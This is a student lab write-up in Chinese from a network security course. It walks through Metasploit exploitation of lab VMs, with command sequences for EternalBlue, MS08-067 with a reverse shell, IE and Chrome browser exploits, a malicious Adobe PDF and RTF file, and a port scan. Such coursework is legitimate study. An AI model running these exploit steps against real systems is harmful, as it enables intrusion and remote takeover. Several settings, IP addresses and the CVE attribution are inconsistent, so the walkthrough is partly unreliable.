《网络对抗技术》——Exp6 MSF应用基础

发布时间 2023-05-05 00:30:54作者: B1smarck

一、实践内容

​ 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

  • 一个主动攻击实践,尽量使用最新的类似漏洞;
  • 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
  • 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
  • 成功应用任何一个辅助模块。

二、实践原理

  • MSF攻击方法

    • 主动攻击:扫描主机漏洞
    • 攻击浏览器
    • 供给客户端
  • 六个模块

    • 渗透攻击模块

      exploit

      • 利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问权的代码组件。
    • 辅助模块

      Auxiliary

      • 能够帮助渗透测试中在进行渗透攻击之前得到的目标系统丰富的情报信息,从而发起更具目标性的精准攻击。
      • 主要包括针对各种网络服务的扫描和查点、构建虚假服务收集登录密码、口令猜测破解、敏感信息嗅探、探查敏感信息泄露、Fuzz测试发掘漏洞、实施网络协议欺骗等模块。
    • 攻击载荷

      Payload

      • 在渗透成功后促使目标系统运行的一端植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接。实际上,该模块就是计算机集成的针对不同操作系统实现shellcode攻击的ruby代码。
      • 三种payload :Single,Stager,Stages。
    • 空字段模块

      Nop:

      • 一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令,最典型的空指令就是空操作,在X86 CPU体系架构平台上的操作码是0x90,便于快速确定返回地址的位置
    • 编码模块

      Encoders:

      • 针对payload进行编码,可以通过多种编码手段、多次编码方式有效的改变payload代码特征
    • 后渗透攻击模块

      Post :

      • 支持在渗透攻击取得目标系统远程控制权之后,在受控系统中进行给各样的后渗透攻击动作。
  • MSF的三种用户操作界面

    • msfconsole
      • 查看模块的具体信息info [exploits|auxiliary|post|payloads|encoders|nops]
      • 查看设置信息show [options]
      • 查看攻击目标类型show [target]
      • 查找命令search
      • 查找2018年产生的在windows平台下的漏洞search ms18(或CNE:2018) type:exploit platform:windows
    • armitage
      • 启动服务器service postgresql start
      • 启动armitagearmitage
    • webgui

三、实践过程

0、前期准备

image-20230429111512814

1、一个主动攻击实践

查看版本

msfconsole
search scanner/smb/smb_
use 7
show options
set rhosts 192.168.171.128
run

image-20230429131503903

查找对应利用漏洞模块

search exploit/windows/smb/

image-20230429131615771

第19条攻击方式:ms17-010(win7)
查看靶机该漏洞:nmap -sS -A --script=smb-vuln-ms17-010 -PO 192.168.171.135
选择对应MSF板块,设置靶机ip地址,执行攻击:
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.171.135
exploit

image-20230429132021553

image-20230429132212341

2 ms08_067_netapi

  • ms08_067漏洞是著名的远程溢出漏洞。攻击者发送恶意资料到受害机默认开放的SMB服务端口445,通过MSRPC接口调用server服务的一个函数,并破坏程序的栈缓存区,获得远程代码执行权限,从而完全控制主机。

  • 靶机:Windows xp

  • 攻击机:Kali

  • 获取靶机IP地址 192.168.171.134

  • 攻击机试探靶机是否存在此漏洞 sudo nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.171.131

image-20230504224440902

sudo msfconsole
search ms08-067 //查看漏洞位置
use exploit/windows/smb/ms08_067_netapi //选择该漏洞
set payload generic/shell_reverse_tcp //设置攻击的载荷
set RHOSTS 192.168.171.132 //靶机IP
set LHOSTS 192.168.171.134 //攻击机IP
exploit //进行攻击

image-20230504224905406

image-20230504231859666

成功!

(2) 针对浏览器的攻击

查找对应利用漏洞模块

search exploit/windows/smb/

image-20230429132338674

第117条攻击方式:ms10_018_ie_behaviors(win7)

use exploit/windows/browser/ms10_018_ie_behaviors 
set payload windows/meterpreter/bind_tcp 
set RHOST 192.168.171.135
set target 0 
exploit

image-20230429133345684

使用win7的IE浏览器访问Using URL: http://192.168.171.128:8080/0I5QQR

image-20230429133326764

输入该网址会报错,其他网页都可以正常打开

image-20230429133102796

第50条攻击方式:chrome_filereader_uaf(win7)

use exploit/windows/browser/chrome_filereader_uaf 
set payload windows/meterpreter/reverse_tcp 
set URIPATH / 
set LHOST 192.168.171.135 
exploit

image-20230429133701096

靶机端在浏览器安装目录的文件夹开cmd输入C:\Program Files\Google\Chrome\Application>chrome.exe --no-sandbox以沙箱关闭的状态执行chrome.exe,在地址栏输入地址http://192.168.253.136:8080

image-20230429133940513

(3)针对客户端的攻击

攻击方式:Adobe(adobe_cooltype_sing) (XP)

攻击原理:https://www.likecs.com/show-305616517.html

msfconsole //进入控制台 

search adobe //进行查找 

use windows/fileformat/adobe_cooltype_sing //使用漏洞 

info //查看漏洞具体信息 

set payload windows/meterpreter/bind_tcp //选择攻击载荷 

show options //查看详细信息 

set LPORT 1317//设置端口号 

set RHOST 192.168.171.138//设置靶机IP地址 

exploit #攻击

image-20230429134232525

查看漏洞具体信息

image-20230429134304318

image-20230429135018104

将生成的msf文件复制到win7中,点击回连

(可以使用cp命令将文件复制到桌面再移动,也可以使用超级用户权限进入root)

use exploit/multi/handler //进入监听模块 

set payload windows/meterpreter/bind_tcp //选择攻击载荷 

show options //查看详细信息 

set RHOST 192.168.171.138 //设置靶机IP地址 

set LPORT 1317 //设置端口号 

exploit //攻击

image-20230504232622262

image-20230504232634711

image-20230504232651153

成功!

Office(word)渗透攻击实战案例
MS10-087

如果用户打开或预览特制的RTF电子邮件,则最严重的漏洞可能允许远程执行代码。成功利用这些漏洞中的任何一个的攻击者可以获得与本地用户相同的用户权限。与使用管理用户权限进行操作的用户相比,将其帐户配置为在系统上具有较少用户权限的用户受到的影响较小。
低版本的word版本会出现RTF文件漏洞。
攻击复现

use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

set payload windows/exec

set CMD calc.exe

set FILENAME regedit.exe

exploit

将这个文件复制给target机,双击打开。

成功!

20170305112315293

(4)成功应用任何一个辅助模块

使用PortScan进行端口扫描

use auxiliary/scanner/portscan/tcp

show options

set rhosts 192.168.171.136

exploit

image-20230504232940869

四、实践问题回答

用自己的话解释什么 是exploit,payload,encode。

Exploit是指利用计算机系统或软件中的漏洞,通过特定的代码或技巧来获取未授权的访问权限或执行恶意操作的过程。

Payload是指在攻击中使用的恶意代码,通常包含了攻击者希望在目标系统上执行的恶意操作,例如窃取敏感信息、破坏系统或者建立远程访问通道等。

Encode是指对数据进行编码的过程,以便在网络传输或存储中能够更好地保护数据的完整性和安全性。在安全领域中,编码通常用于隐藏或混淆恶意代码,使其难以被检测到或分析。常见的编码方式包括Base64、Hexadecimal等。

五、离实践还缺什么技术或步骤

本次实践主要说明了信息搜集、把病毒或后门程序输送到期望的目标机在攻击包括防范漏洞攻击的重要性。经过这次实践,将病毒和后门程序真正展现起作用才是最重要的。除此之外,自己还需要加强解决问题和随机应变分析问题的能力,做到心中有数。

六、实践心得体会

CVE-2017-11882是一种微软Office Equation Editor漏洞,它存在于Microsoft Office 2007 Service Pack 3、Microsoft Office 2010 Service Pack 2、Microsoft Office 2013 Service Pack 1、Microsoft Office 2016以及Microsoft Office 2016 Click-to-Run版本中。攻击者可以利用该漏洞在受影响的系统上执行任意代码,从而导致系统被入侵。这个漏洞在攻击中十分常见,用于进行钓鱼攻击、恶意文件传播等。

本次我通过Msf利用msf复现了各种漏洞,学习体会如下:

首先,我安装了免费的Metasploit框架。Metasploit是一种流行的漏洞利用工具,它提供了一种简单的方法来测试和验证漏洞。

其次,我通过Metasploit框架使用模块exploit/windows/fileformat/office_word_hta来利用漏洞。这个模块利用了Microsoft Office Equation Editor的漏洞来执行任意代码。首先,我设置了目标IP地址和端口,然后设置了恶意文档的名称和输出路径。接着,我运行了exploit命令,Metasploit框架开始探测目标系统是否存在漏洞,并利用漏洞执行恶意代码。

最后,我通过Metasploit框架实现了对目标系统的远程控制。我能够访问受感染的系统的命令提示符,上传和下载文件,以及执行其他命令。

在学习的过程中,我深刻认识到漏洞利用的威胁。这种漏洞可以让攻击者轻松地突破系统安全防线,并获得对系统的控制。在现代互联网时代,漏洞利用已成为黑客攻击的主要手段之一。因此,我们需要加强对网络安全的认识,加强对漏洞的预防和修补,以保护我们的网络安全。